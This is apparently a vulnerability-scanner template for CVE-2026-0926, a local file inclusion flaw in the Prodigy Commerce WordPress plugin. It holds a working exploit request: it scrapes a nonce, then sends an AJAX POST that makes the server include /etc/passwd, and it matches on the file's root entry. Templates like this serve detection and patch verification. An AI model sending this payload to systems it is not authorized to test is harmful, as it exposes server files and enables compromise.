id: CVE-2026-0926

info:
  name: Prodigy Commerce <= 3.2.9 - Local File Inclusion
  author: Shivam Kamboj
  severity: critical
  description: |
    Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of the 'parameters[template_name]' parameter of the prodigy-render-my-account-widget AJAX action, letting unauthenticated attackers include and execute arbitrary files on the server.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP code, bypass access controls, and access sensitive data, potentially leading to full server compromise.
  remediation: |
    Update to a version later than 3.2.9.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/prodigy-commerce/prodigy-commerce-329-unauthenticated-local-file-inclusion-via-parameterstemplate-name
    - https://nvd.nist.gov/vuln/detail/CVE-2026-0926
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-0926
    epss-score: 0.29091
    epss-percentile: 0.96671
    cwe-id: CWE-98
  metadata:
    max-request: 2
    verified: true
  tags: cve,cve2026,wordpress,wp,wp-plugin,lfi,prodigy-commerce,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'var settings\s*=\s*\{[^}]*"nonce"\s*:\s*"([a-f0-9]+)"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=prodigy-render-my-account-widget&nonce={{nonce}}&parameters[template_name]=etc/passwd&parameters[default_path]=/

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b43eb15954d6ef43bf38f11716997b5e442e9b637c4fc078316eb1118021041d02207bd5a6d3481cff76ad34c961607db6acf8453ed8a07f9ca8acece96fc507f86b:922c64590222798bb761d5b6d8e72950